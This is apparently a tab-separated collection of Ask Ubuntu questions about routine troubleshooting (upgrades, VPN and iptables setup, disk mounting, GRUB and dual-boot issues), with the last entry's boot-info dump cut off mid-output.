432845	unicodedecodeerror when running ubuntu-support-status	i had a problem during update 12.04 and asked the question yesterday.i tried the suggested solutions . now i got the following message ( update problem still remains ) : thomas @ thomas-satellite-p200 : ~ $ ubuntu-support-status traceback ( most recent call last ) : file `` /usr/bin/ubuntu-support-status '' , line 79 , in help=_ ( `` show unsupported packages on this machine '' ) .decode ( enc ) ) unicodedecodeerror : 'ascii ' codec ca n't decode byte 0xc3 in position 13 : ordinal not in range ( 128 ) any ideas ? edit : the topic yesterday was : problem after updating 12.o4 answer was to try one of the solutions of : '' how do i fix a “problem with mergelist” or “status file could not be parsed” error when trying to do an update ? '' i tried that and came up with the above file . @ florian diesch : '' locale '' created the following file : thomas @ thomas-satellite-p200 : ~ $ locale lang=c language=de_de : en lc_ctype= '' c '' lc_numeric=de_de.utf-8 lc_time=de_de.utf-8 lc_collate= '' c '' lc_monetary=de_de.utf-8 lc_messages= '' c '' lc_paper=de_de.utf-8 lc_name=de_de.utf-8 lc_address=de_de.utf-8 lc_telephone=de_de.utf-8 lc_measurement=de_de.utf-8 lc_identification=de_de.utf-8 lc_all=
432849	performance goes to zero when ram cache is full	this is n't a straightforward question as i 've read that cached ram will be released when needed . i have the hunch that this is not happening on my system ( or something else is skrewed ) . i have a amd 8core fx , 32gigs of ram and raid0 ssd running 64bit ubuntu 13.10 . i notice poor performance after my system and my app runs over night . when i wake my computer , the cached ram is about ~22gigs and used ram is ~8-10gigs . the mouse lags , i cant close a window and sometimes i cant even switch to a text-terminal ( ctrl+alt+f1-6 ) if i am lucky to have an open terminal i can ( move my mouse for the next 5min to the terminal and ) kill my app , regain some ram and it starts to perform better and after 10min i am back at the performance i am used to . then i can restart my app and everything remains smooth . i can also kill the browser and regain performance but as my app needs the most ram , i can get the fastest performance boost out of it . but to be complete , my app uses node , nginx , redis & mongo ( all running locally ) if that has any implications . so , my questions are ; 1 ) what could the issue be for this ? can i provide you guys with some specific system log ? 2 ) is there a cmd to flush the cached ram and give it back to the system asap ? 3 ) could this be related to my passive graficscard that needs to `` wake up for 10minutes '' ? 4 ) any hints/tips/configs i should be aware of ( bios ? ) ? thank you for any help regarding this nerve-bending issue ! /edit : following the comments , here is some ouput regarding the powersettings , its set to `` do n't suspend '' and in the locksettings its set to `` turn off screen '' . free -m ( from now , when the system is stable . i 'll try to get one when the system is slow ) total used free shared buffers cached mem : 32066 24360 7705 0 241 19556 -/+ buffers/cache : 4561 27504 swap : 32654 1137 31517 grep swappiness /etc/sysctl.conf does n't produce any output . is that good or bad ?
432850	resource monitor	i have a vps that i have just purchased and i want to start monitoring the resources as i refuse to pay for the additional feature on the management tool to do that . i wondered if there is something out there that can log resource usage ( cpu , mem , disk ) that just sits in the background logging and if resources get too hi then notify me . is this something i should write in bash and run as a cron job ? ? i just want something light that wont be resource hungry . thanks
432855	how to connect to a l2tp vpn given some info from a sysadmin	i have been given some details of a vpn i am meant to connect to , and ca n't for the life of me get it to work under kubuntu . the info i have been given is ( fake values substituted where appropriate of course ) : i have configured a new vpn account for you on our server . your login details are as follows : ip address : 1.2.3.4 username : myfullname password : wordpass shared secret : xxxxxxxxxx the connection type is l2tp . ensure that you select the option to send all traffic over the vpn . i have tried 2 routes : 1 ) using the kde widget to configure this 2 ) using config files to configure this using the widget : i add the https : //launchpad.net/~seriy-pr/+archive/network-manager-l2tp ppa , and install network-manager-l2tp . then , i add an l2tp connection and i come across the following fields ( which i fill in ) : gateway ( 1.2.3.4 ) user name : ( myfullname ) password : ( wordpass ) then i go into ipsec settings , and ( after checking `` enable ipsec tunnel to l2tp host ) : group name gateway id pre-shared key i fill in pre-shared key with xxxxxxxxxx , and click ok. then i try to connect , and get the following error : '' necessary secrets for the vpn connection were not provided . '' using config files , and using https : //www.elastichosts.com/support/tutorials/linux-l2tpipsec-vpn-client/ as a guide , i do the following : i add the following to /etc/ipsec.conf : config setup ... . protostack=netkey plutoopts= '' -- interface=wlan0 '' ... . conn tab-vpn authby=secret pfs=no auto=add keyingtries=3 dpddelay=30 dpdtimeout=120 dpdaction=clear rekey=yes ikelifetime=8h keylife=1h type=transport left= % defaultroute leftnexthop= % defaultroute leftprotoport=17/1701 right=1.2.3.4 i add the following to /etc/ipsec.secrets : % any 1.2.3.4 : psk `` xxxxxxxxxx '' then when i restart ipsec with : sudo ipsec auto -- up tab-vpn i get : 104 `` tab-vpn '' # 1 : state_main_i1 : initiate 003 `` tab-vpn '' # 1 : ignoring vendor id payload [ ms nt5 isakmpoakley 00000009 ] 003 `` tab-vpn '' # 1 : received vendor id payload [ rfc 3947 ] method set to=115 003 `` tab-vpn '' # 1 : received vendor id payload [ draft-ietf-ipsec-nat-t-ike-02_n ] meth=106 , but already using method 115 003 `` tab-vpn '' # 1 : ignoring vendor id payload [ fragmentation ] 003 `` tab-vpn '' # 1 : ignoring vendor id payload [ ms-negotiation discovery capable ] 003 `` tab-vpn '' # 1 : ignoring vendor id payload [ ike cga version 1 ] 106 `` tab-vpn '' # 1 : state_main_i2 : sent mi2 , expecting mr2 003 `` tab-vpn '' # 1 : nat-traversal : result using draft-ietf-ipsec-nat-t-ike ( macos x ) : both are nated 108 `` tab-vpn '' # 1 : state_main_i3 : sent mi3 , expecting mr3 003 `` tab-vpn '' # 1 : we require peer to have id '1.2.3.4 ' , but peer declares '192.168.122.2' 218 `` tab-vpn '' # 1 : state_main_i3 : invalid_id_information i and the server in question are behind the same firewall . it should allow me to connect so i can move onto setting up the xl2tpd.conf options , but i do n't get that far . help ?
432857	login loop after unsucessful upgrade	hi i attempted an upgrade from 12.10 today . the process came up with an error and after reboot it got to a login loop . when i put my password in it just jumps to a terminal screen and back to login . i am using a dell inspiron 5 . i tried cinnamon and several other solutions and after the last one it started going past the login screen but only to get to a blank screen with the default background and then reboot .
432864	deploying a specific version of a software from a juju charm ?	suppose i 'm using the postgresql charm to deploy my databases . how can i control the version of the postgresql ( 9.1 , 9.2 , 9.3 , etc ) that is deployed ? thank you
432865	port wo n't open !	i have a server that want to allow connections into it through port 25565 , but when i test on http : //www.yougetsignal.com/tools/open-ports/ it says they are closed ? i have no outfacing interface configured either my router has ports 25565 open , and these are my iptables rules $ iptables -l chain input ( policy accept ) target prot opt source destination accept tcp -- anywhere anywhere tcp dpt : webmin accept tcp -- anywhere anywhere tcp dpt:25565 all -- anywhere anywhere state new , related , established chain forward ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination chain prerouting ( policy accept ) target prot opt source destination dnat tcp -- anywhere 94.5.56.101 tcp to:192.168.0.8 $ iptables -t nat -l chain input ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination chain postrouting ( policy accept ) target prot opt source destination masquerade all -- anywhere anywhere
432868	problem installing 12.04 to dual-boot with 13.10	i have a system currently with ubuntu 13.10 , setup to boot to commandline . we want to also have ubuntu 12.04 installed as dual-boot . i downloaded the iso , burned to usb and tried installing . but the installation gui wo n't start , see picture attached . the system is n't hang , you can still type on the commandline but it does n't do anything . i tried using 13.10 iso and followed the same steps and was able to get to the install-gui without issue . any idea ?
432869	black screen before log in screen in a new installed ubuntu 12.04	i very confused with this output in my screen , specifically when i am really to login into ubuntu 12.04 lts . my computer is a toshiba satellite a665-s5117 with double partition with windows 7 . that screen is completely freeze and the solution is turn off the system . some suggestions ? the same error occurs when i am in ubuntu desktop and try to turn on my wireless because ubuntu reports a connection interrupted by physical interrupter.. the image : thanks .
432872	what is changing the network interfaces ?	i installed ubuntu 12.04 to virtual machine . i have edited /etc/network/interfaces like this : auto lo iface lo inet loopback auto eth0 iface eth0 inet dhcp then i created a livecd.iso using relinux . network interfaces is changing after boot from dvd ( livecd.iso ) . /etc/network/interfaces after boot from dvd : auto lo iface lo inet loopback auto eth0 iface eth0 inet dhcp auto wlan0 iface wlan0 inet dhcp auto eth1 iface eth1 inet dhcp auto wlan1 iface wlan1 inet dhcp but it is changing different if i boot livecd.iso via nfs . /etc/network/interfaces after boot via nfs ( network file system ) : auto lo iface lo inet loopback auto eth0 iface eth0 inet manual auto wlan0 iface wlan0 inet manual auto eth1 iface eth1 inet manual auto wlan1 iface wlan1 inet manual i 'm really confused . what is changing the network interfaces ? how can i prevent the changes ? note : after some research , someone pointed me `/etc/udev/rules.d/70-persistent-net.rules file . it was empty . i removed it and created livecd.iso again but same things happened .
432873	ubuntu 13.10 newly installed blank desktop	after couple of minutes waiting i successfully installed ubuntu 13.10 ... but unfortunately after booting on ubuntu , it does n't show anything only blank desktop and wallpaper..need your help guys ... . i already tried the compiz method but it does n't fix anything ... also the graphics shows as unknown
432874	faster ( and less precise ) alternarives to dd	i love dd with all my electronic heart , but sometimes it takes to long and i dont actually need byte by byte exact hdd replicas i was thinking of resizing the partition in question to minimum free space possible and then running dd on it would only copy the actual files ; or zipping work quite nice , especially if that partition was formated beforehand and had lots of blank spaces with 0s but are there any other alternatives to backup only the files ( i love to restore windows with dd , but images are big ) , or wipe unused space before dd|gzip , or just make dd faster sacrificing unallocated partition space ?
432879	how can i install the development version of node ?	i want to get the latest updates for node ( evented i/o for v8 javascript ) . i already have installed node using : sudo apt-get install -y python-software-properties python g++ make sudo add-apt-repository ppa : chris-lea/node.js -y sudo apt-get update sudo apt-get install nodejs -y how can i get the latest updates ? maybe using a ppa for development version ?
432882	installing a new hard drive on an existing ubuntu machine	i have a desktop machine running ubuntu for a few years . i needed more space for my files and for that purpose i purchased and installed a brand new hd in it . everything is working great . the only issue is that the hd is not mounting when the computer boots . in order to my applications to find the files in the new hd i have to click on the icon of the new hd to cause it to mount . i have been clinking on that thing for a long time because i ca n't figure out how to manage fstab . i followed the instructions from the following link : auto mount a drive that located on ubuntu and auto share that drive for window when i follow the instruction it does not seem to mount the hd in the same place as if i had clicked on the icon of the hd in nautilus and unity . this is what i put on my fstab /dev/sdb1 /media/jean/2 ext4 users , user 0 0 note that my user name account is jean . i wrote on fstab what i believe should work to mount the hd on boot and allow access to the files and folders within that hard drive by my applications . the applications do not seem to be able to handle the files and folders . do i need to set permissions ? is the path correct ? what does users , user 0 0 means ? that application `` disks '' have no use either ! cold not make it happen . your help is much appreciated . thank you !
432886	ca n't select ubuntu 12.04 when computer boots up	i have a dell c521 it came loaded with windows xp today , i installed ubuntu 12.04 when i restart the computer , it asks `` please select operating system to start '' it gives me two choices : windows xp or ubuntu . i want to select ubuntu , but i ca n't move the cursor off of windows xp and onto ubuntu . it 's as if my keyboard is dead . the cursor will not move . hitting f2 , f8 , f10 . f12 , tab , backspace , etc . does nothing . after about 30 seconds , the computer loads windows xp i want ubuntu . please help .
432889	half done do-release-upgrade -- now at grub rescue	my computer is running single boot ubuntu 12.04 server version . i was trying to upgrade the release to 12.10 ( following https : //help.ubuntu.com/community/quantalupgrades ) after executing sudo do-release-upgrade , and agreed to proceed with the download , somehow i lost my video output ( hdmi ) . nothing was shown to vga output either . i was able to ssh to my server but was not able to know what was going on with the release upgrade . i just waited long enough till dpkg no longer shows up on top , then i rebooted my server . ( yeah , that was a dumb reboot ) now i 'm stuck at error : file not found grub rescue > i can see my disk using grub rescue > ls ( hd0 , msdos1 ) /
432893	libav : deinsterlace option ?	i have compiled from git sources the libav 2014-march-10 . on usual libav from ubuntu repositories , i was able to use -deinterlace to ... well , deinterlace the video . now this option appears to be missing . any ideas ?
432895	temperature warnings	is there a way to set an alarm or something for when my ubuntu computer is about to overheat ? my computer has some temperature issues , so when it 's about to overheat i 'd like to turn on an external fan .
432896	i am trying to uninstall a version of pcre , but doing so prompts the deletion of > 1gb of files	i just installed ubuntu , and i 'm trying to get all the dependencies for wxwidgets , which depends on glib , which suggests a build of pcre version 8.13 or greater . i had used sudo apt-get libpcre3 libpcre3-dev to install it initially , but it installed version 8.12 . i then downloaded the 8.34 source code , ran the following configuration ./configure -- prefix=/usr \ -- docdir=/usr/share/doc/pcre-8.34 \ -- enable-unicode-properties \ -- enable-pcre16 \ -- enable-pcre32 \ -- enable-pcregrep-libz \ -- enable-pcregrep-libbz2 \ -- enable-pcretest-libreadline \ -- disable-static & & make the make check passed all the tests , but when i tried installing it , there were a few files that were preventing it from completing . i tried running sudo apt-get remove -- purge libpcre3 libpcre3-dev , and variations of that , but they all prompted me to delete a majority , if not all , of my library files . the following new packages will be installed : libgl1-mesa-glx libglapi-mesa warning : the following essential packages will be removed . this should not be done unless you know exactly what you are doing ! e2fsprogs libblkid1 ( due to e2fsprogs ) libuuid1 ( due to e2fsprogs ) util-linux ( due to e2fsprogs ) hostname mount libmount1 ( due to mount ) 0 upgraded , 2 newly installed , 700 to remove and 0 not upgraded . need to get 125 kb of archives . after this operation , 1,485 mb disk space will be freed . you are about to do something potentially harmful . to continue type in the phrase 'yes , do as i say ! ' ? ] n abort . is there something i 'm doing wrong or should be looking for ?
432897	how do i remove lubuntu and keep my files ?	i run lubuntu 13.10 on a s10 lenovo ideapad netbook . i recently installed xubuntu using sudo apt-get instal xubuntu-desktop . i want to install xubuntu ana remove lubuntu but keep my files . any help ?
432898	changing data directory in owncloud	some of you may know owncloud , a free cloud service you can install to set up cloud hosting . i wanted to use owncloud so that i can upload files to a specific folder . since owncloud automatically assigns a folder to each user in its directory , i tried changing this setting only to get this error : an exception occurred while executing 'select `` appid '' from `` oc_appconfig '' where `` configkey '' = 'enabled ' and `` configvalue '' ='yes '' : sqlstate [ hy000 ] : general error : 1 no such table : oc_appconfig i used this guide : http : //forum.owncloud.org/viewtopic.php ? f=26 & t=20261 are there any ways to solve this issue ? alternatively , is there a way to automatically have all of the files in the owncloud user directory sync to a target directory ?
432900	ubuntu 13.10 on asus n550j : battery detected and charged , but laptop wo n't work without charger plugged	i recently installed lubuntu ( 1st time user ) on my asus n550j laptop . i 'm having a problem with the battery or the charger , i do n't know for now ; the battery is there and i presume it is detected : when i do /sys/class/power_supply/bat0/ it just tells me that it is a directory . the acpi -v command gives info about the battery and whatnot , like battery0 : full , 100 % , cooling , temperatures etc . i managed to add the battery-indicator icon on the lower bottom right of my desktop , next to volume indicator icon . it shows a full 100 % green vertical bar , charged . problem is that if i unplug the charger , the laptop just directly shuts down . any help would be really apprecaited , i have no clue on what to try or do at the moment . i 'm using lubuntu ( ubuntu 13.10 )
432903	how to solve connection reset by peer : mod_fcgid	i 'm running a wordpress install on ubuntu however i keep getting the following in my error log [ tue mar 11 14:49:11 2014 ] [ warn ] [ client 23.21.24.219 ] ( 104 ) connection reset by peer : mod_fcgid : error reading data from fastcgi server [ tue mar 11 14:49:11 2014 ] [ error ] [ client 23.21.24.219 ] premature end of script headers : index.php [ tue mar 11 14:49:11 2014 ] [ warn ] [ client 50.19.4.40 ] ( 104 ) connection reset by peer : mod_fcgid : error reading data from fastcgi server [ tue mar 11 14:49:11 2014 ] [ error ] [ client 50.19.4.40 ] premature end of script headers : index.php [ tue mar 11 14:49:11 2014 ] [ warn ] [ client 23.20.68.244 ] ( 104 ) connection reset by peer : mod_fcgid : error reading data from fastcgi server [ tue mar 11 14:49:11 2014 ] [ error ] [ client 23.20.68.244 ] premature end of script headers : index.php [ tue mar 11 14:49:11 2014 ] [ warn ] [ client 50.19.31.100 ] ( 104 ) connection reset by peer : mod_fcgid : error reading data from fastcgi server [ tue mar 11 14:49:11 2014 ] [ error ] [ client 50.19.31.100 ] premature end of script headers : index.php [ tue mar 11 14:49:11 2014 ] [ warn ] [ client 107.22.84.18 ] ( 104 ) connection reset by peer : mod_fcgid : error reading data from fastcgi server [ tue mar 11 14:49:11 2014 ] [ error ] [ client 107.22.84.18 ] premature end of script headers : index.php [ tue mar 11 14:49:11 2014 ] [ warn ] [ client 50.16.36.247 ] ( 104 ) connection reset by peer : mod_fcgid : error reading data from fastcgi server [ tue mar 11 14:49:11 2014 ] [ error ] [ client 50.16.36.247 ] premature end of script headers : index.php [ tue mar 11 14:49:11 2014 ] [ warn ] [ client 184.72.82.95 ] ( 104 ) connection reset by peer : mod_fcgid : error reading data from fastcgi server [ tue mar 11 14:49:11 2014 ] [ error ] [ client 184.72.82.95 ] premature end of script headers : index.php [ tue mar 11 14:57:08 2014 ] [ warn ] [ client 74.112.203.115 ] ( 104 ) connection reset by peer : mod_fcgid : error reading data from fastcgi server [ tue mar 11 14:57:08 2014 ] [ error ] [ client 74.112.203.115 ] premature end of script headers : index.php i have mod_security and suhosin installed not sure if any one could be the cause of the problem how can i debug these error to solve this ?
432904	call shell script `` inline '' in another shell script	so the bottom line here is that i am trying to have one go-to script work to set environment variables ( let 's call it setenv.sh ) that will be used in subsequent scripts . in windows ( i know , that is a 4-letter word here ... ) i can use a batch file to set a environment variable for after the batch file is over . i am looking for that same effect . however , i have just learned , through perusing the internet , that environment variables set in a script ( aka a shell ) only persist in child shells , and do not affect the parent shells . okay whatever , well now what i want to know is can i run a script inline in another script ? by inline , i am talking about something analogous to c/c++ 's # include directive . i want this because if i can call a script as if it were running in the current script , my environment variables would at least persist through the duration of my desired script . for example , something like this : cat ~/install/setenv.sh | /bin/bash echo `` jboss home directory is set to $ jboss_home '' but i realize even that wo n't quite work , and i am starting a child shell with a call to /bin/bash . i am fine if i have to call this setenv.sh for each script i want it to run inline with .
432913	usb mouse not recognized at boot-up	when i boot up my system , the mouse cursor does not appear . if i then manually unplug and then replug the mouse , the mouse cursor appears and i can use it . i am running ubuntu 13.10 on a system with the following specs : motherboard : asus z87-pro cpu : i7-4770k memory : 16gb graphics : geforce gtx 770 disk : samsung 840 solid state 500gb drive ( primary ) + 2 wd 3tb sata drives keyboard/mouse : logitech mk120 ( usb ) i tried swapping out the mouse for a different brand , but this did not help . i also tried disabling legacy usb in the bios , but this did not help either . thanks in advance from a long-ago unix hacker for any advice on how to troubleshoot and resolve this problem .
432914	reinstall drivers after migration to different hardware ( 12.04 )	i 've extracted hdd with existent 12.04 installation out of one laptop and plugged it in another laptop . then i upgraded kernel from 3.2 to 3.8 . now i can see that some hardware features does not work as expected . for example laptop display brightness can be decreased by one level only . ( by fn+special key combination pressing ) . this worked good on previous laptop and i was able to increase/decrease display brightness by several times . another problem is my network card , which is disabled by default and after returning from suspend mode whereas wifi card is enabled . one more issue is touchpad right button , which does not invoke context menu rendering as right mouse button does . i 'm not sure this can be fixed at all , but i have an assumption that some of current issues i 'm experiencing now would n't reproduce in case of clean system installation . is it possible to force all system drivers re-installation/re-initialization ?
432915	running ubuntu from a usb drive	i have been `` trying '' ubuntu on a usb drive . i did some work today . shut down the laptop . started it again ( directing the boot to the usb drive so ubuntu loaded up ) , but none of my saved text ( .odt ) or a few downloaded .pdf files can be found . did i create a virtual desktop and documents folder when running ubuntu from my usb ? were these files deleted when the computer was shut down . searches for them on the heard drive 9pc ) and on the usb do not turn up the files . suggestions ? thanks
432916	how to use grub2 to boot system rescue cd iso saved on unmounted partation at hard drive ?	i want to make a helper partition which may include a lot of rescue iso files like 'hiern 's boot ' , 'system rescue ' , any live cd and others . i started to make a partition by using the following command : $ sudo fdisk /dev/sdb i used fdisk command parameters ( or sub commands ) to make a partition /dev/sdb6 [ extended partition ] then i made a mount point by using the following commands : $ sudo mkdir /mnt/rescue $ sudo mount /dev/sdb6 /mnt/rescue $ sudo chmod +rwx /mnt/rescue i then made a menu entry at /etc/grub.d/40_custom file with the following entries menuentry `` ubuntu-12.04-iso '' { set isofile= '' /mnt/ubu12-04/ubuntu-12.04-desktop-i368.iso '' loopback loop ( hd0,6 ) $ isofile linux ( loop ) /casper/vmlinuz boot=casper iso-scan/filename= $ isofile noprompt noeject initrd ( loop ) /casper/initrd.lz } after all this i restarted my computer and found just the following entry : `` ubuntu-12.04-iso `` in the grub menu but it does n't work . what did i do wrong ? note : i am using 2 hard disks 1st one with /dev/sda and the 2nd with /dev/sdb how can i make boot for systemrescuecd.iso , heirn 's boot.iso and ubuntu-12.04.iso ?
432924	ubuntu/windows 8 dual boot issues	recently i was able to dual boot my pre-installed windows 8 laptop with ubuntu 13.04 ; however , i had to delete the ubuntu partition . because of this i had to restore my laptop to factory settings . now i would like to re-install ubuntu , but for some reason the livecd does not find my dedicated partition . also , ubuntu is still showing up in my uefi boot even though i ran easybcd and boot repair in windows . does anyone have any suggestions on what could cause ubuntu not to find my partition ? here is the print out from the 'sudo fdisk -l ' command ubuntu @ ubuntu : ~ $ sudo fdisk -l warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x5c4d88bb device boot start end blocks id system /dev/sda1 1 1953525167 976762583+ ee gpt partition 1 does not start on physical sector boundary . warning : gpt ( guid partition table ) detected on '/dev/sdb ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sdb : 32.0 gb , 32017047552 bytes 256 heads , 63 sectors/track , 3877 cylinders , total 62533296 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x2ed16d17 device boot start end blocks id system /dev/sdb1 1 4294967295 2147483647+ ee gpt disk /dev/sdc : 2051 mb , 2051014656 bytes 33 heads , 63 sectors/track , 1926 cylinders , total 4005888 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdc1 * 32 4005887 2002928 b w95 fat32 ubuntu @ ubuntu : ~ $ boot info script 0.61 [ 1 april 2012 ] ============================= boot info summary : =============================== = > windows is installed in the mbr of /dev/sda . = > no boot loader is installed in the mbr of /dev/sdb . = > syslinux mbr ( 4.04 and higher ) is installed in the mbr of /dev/sdc . = > windows is installed in the mbr of /dev/mapper/isw_bdfhjajgjj_wx11a82y0834 . = > no boot loader is installed in the mbr of /dev/mapper/isw_dhhceichda_volume_0000 . sda1 : __________________________________________ file system : vfat boot sector type : unknown boot sector info : no errors found in the boot parameter block . mounting failed : mount : /dev/sda1 already mounted or sda1 busy sda2 : __________________________________________ file system : vfat boot sector type : unknown boot sector info : no errors found in the boot parameter block . mounting failed : mount : /dev/sda1 already mounted or sda1 busy mount : /dev/sda2 already mounted or sda2 busy sda3 : __________________________________________ file system : boot sector type : - boot sector info : mounting failed : mount : /dev/sda1 already mounted or sda1 busy mount : /dev/sda2 already mounted or sda2 busy mount : unknown filesystem type '' sda4 : __________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . mounting failed : mount : /dev/sda1 already mounted or sda1 busy mount : /dev/sda2 already mounted or sda2 busy mount : unknown filesystem type '' fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy sda5 : __________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . mounting failed : mount : /dev/sda1 already mounted or sda1 busy mount : /dev/sda2 already mounted or sda2 busy mount : unknown filesystem type '' fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy sda6 : __________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . mounting failed : mount : /dev/sda1 already mounted or sda1 busy mount : /dev/sda2 already mounted or sda2 busy mount : unknown filesystem type '' fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy sda7 : __________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . mounting failed : mount : /dev/sda1 already mounted or sda1 busy mount : /dev/sda2 already mounted or sda2 busy mount : unknown filesystem type '' fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy sdb1 : __________________________________________ file system : boot sector type : - boot sector info : mounting failed : mount : /dev/sda1 already mounted or sda1 busy mount : /dev/sda2 already mounted or sda2 busy mount : unknown filesystem type '' fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy mount : unknown filesystem type '' sdc1 : __________________________________________ file system : vfat boot sector type : syslinux 4.07 2013-07-25 boot sector info : syslinux looks at sector 29324 of /dev/sdc1 for its second stage . syslinux is installed in the /uui directory . the integrity check of the adv area failed . no errors found in the boot parameter block . operating system : boot files : /boot/grub/grub.cfg /efi/boot/grubx64.efi isw_bdfhjajgjj_wx11a82y08341 : ____________________________ file system : boot sector type : unknown boot sector info : mounting failed : mount : /dev/sda1 already mounted or sda1 busy mount : /dev/sda2 already mounted or sda2 busy mount : unknown filesystem type '' fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy mount : unknown filesystem type '' mount : unknown filesystem type '' isw_bdfhjajgjj_wx11a82y08342 : ____________________________ file system : boot sector type : unknown boot sector info : mounting failed : mount : /dev/sda1 already mounted or sda1 busy mount : /dev/sda2 already mounted or sda2 busy mount : unknown filesystem type '' fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy mount : unknown filesystem type '' mount : unknown filesystem type '' mount : unknown filesystem type '' isw_bdfhjajgjj_wx11a82y08343 : ____________________________ file system : boot sector type : unknown boot sector info : mounting failed : mount : /dev/sda1 already mounted or sda1 busy mount : /dev/sda2 already mounted or sda2 busy mount : unknown filesystem type '' fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy mount : unknown filesystem type '' mount : unknown filesystem type '' mount : unknown filesystem type '' mount : unknown filesystem type '' isw_bdfhjajgjj_wx11a82y08344 : ____________________________ file system : boot sector type : unknown boot sector info : mounting failed : mount : /dev/sda1 already mounted or sda1 busy mount : /dev/sda2 already mounted or sda2 busy mount : unknown filesystem type '' fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy mount : unknown filesystem type '' mount : unknown filesystem type '' mount : unknown filesystem type '' mount : unknown filesystem type '' mount : unknown filesystem type '' isw_bdfhjajgjj_wx11a82y08345 : ____________________________ file system : boot sector type : unknown boot sector info : mounting failed : mount : /dev/sda1 already mounted or sda1 busy mount : /dev/sda2 already mounted or sda2 busy mount : unknown filesystem type '' fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy mount : unknown filesystem type '' mount : unknown filesystem type '' mount : unknown filesystem type '' mount : unknown filesystem type '' mount : unknown filesystem type '' mount : unknown filesystem type '' isw_bdfhjajgjj_wx11a82y08346 : ____________________________ file system : boot sector type : unknown boot sector info : mounting failed : mount : /dev/sda1 already mounted or sda1 busy mount : /dev/sda2 already mounted or sda2 busy mount : unknown filesystem type '' fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy mount : unknown filesystem type '' mount : unknown filesystem type '' mount : unknown filesystem type '' mount : unknown filesystem type '' mount : unknown filesystem type '' mount : unknown filesystem type '' mount : unknown filesystem type '' isw_bdfhjajgjj_wx11a82y08347 : ____________________________ file system : boot sector type : unknown boot sector info : mounting failed : mount : /dev/sda1 already mounted or sda1 busy mount : /dev/sda2 already mounted or sda2 busy mount : unknown filesystem type '' fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy mount : unknown filesystem type '' mount : unknown filesystem type '' mount : unknown filesystem type '' mount : unknown filesystem type '' mount : unknown filesystem type '' mount : unknown filesystem type '' mount : unknown filesystem type '' mount : unknown filesystem type '' isw_dhhceichda_volume_00001 : _____________________________ file system : boot sector type : unknown boot sector info : mounting failed : mount : /dev/sda1 already mounted or sda1 busy mount : /dev/sda2 already mounted or sda2 busy mount : unknown filesystem type '' fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy mount : unknown filesystem type '' mount : unknown filesystem type '' mount : unknown filesystem type '' mount : unknown filesystem type '' mount : unknown filesystem type '' mount : unknown filesystem type '' mount : unknown filesystem type '' mount : unknown filesystem type '' mount : unknown filesystem type '' ============================ drive/partition info : ============================= drive : sda _______________________________________ disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 